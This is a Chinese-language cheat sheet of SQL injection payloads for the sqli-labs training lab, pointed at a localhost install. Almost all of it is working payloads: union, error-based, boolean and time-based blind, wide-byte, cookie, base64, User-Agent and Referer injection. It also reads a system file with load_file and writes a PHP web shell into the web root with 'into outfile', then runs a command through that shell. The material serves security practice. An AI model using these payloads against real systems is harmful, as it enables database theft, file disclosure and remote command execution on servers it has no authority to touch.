sql注入--sqli-labs-less1~9

常规注入

1. 127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),3–+less1字符型联合注入
2. 127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 union select 1,version(),3–+less2数字型联合注入
3. 127.0.0.1/sqlilabs/Less-3/?id=1’) and 1=2 union select 1,version(),3–+less3字符型联合注入
4. 127.0.0.1/sqlilabs/Less-4/?id=1") and 1=2 union select 1,version(),3–+less4字符型联合注入
5. 127.0.0.1/sqlilabs/Less-5/?id=1’ and updatexml(1,concat(0x5e,version(),0x5e),1)–+less5字符型报错注入
6. 127.0.0.1/sqlilabs/Less-6/?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)–+less6字符型报错注入
7. 127.0.0.1/sqlilabs/Less-7/?id=1’)) union select 1,"",3 into outfile “E:\phpstudy_pro\WWW\1.php”–+less7文件上传注入,执行shell: 127.0.0.1/1.php?666=echo whoami;
8. 127.0.0.1/sqlilabs/Less-8/?id=1’ and substr(version(),1,1)=5–+less8布尔盲注
9. 127.0.0.1/sqlilabs/Less-9/?id=1’ and if(substr(version(),1,1)=5,sleep(5),1)–+less9时间盲注

非常规注入

1. select File_priv from mysql.user where user=‘root’ and host=‘localhost’;–判断当前用户是否具有文件权限
   127.0.0.1/sqlilabs/Less-1/?id=1’ and 1=2 union select 1,version(),load_file(“C:\Windows\System32\drivers\etc\hosts”)–+读取文件
   127.0.0.1/sqlilabs/Less-1/?id=1’and 1=2 union select 1,"",3 into outfile “E:\phpstudy_pro\WWW\2.php”–+写入文件
2. http://127.0.0.1/sqlilabs/Less-32/?id=1%df’ and 1=2 union select 1,version(),3–+less32宽字节注入,%df+\在GBK相当于一个汉字
3. document.cookie=“uname=Dumb’ and extractvalue(1,concat(0x7e,database(),0x7e))#” less20 Cookie 注入
4. document.cookie=“uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSkpIw==” less22 base64注入
5. User-Agent:hacker’ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1 less18 User-Agent 注入
6. hacker’ and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1 less19 Referer 注入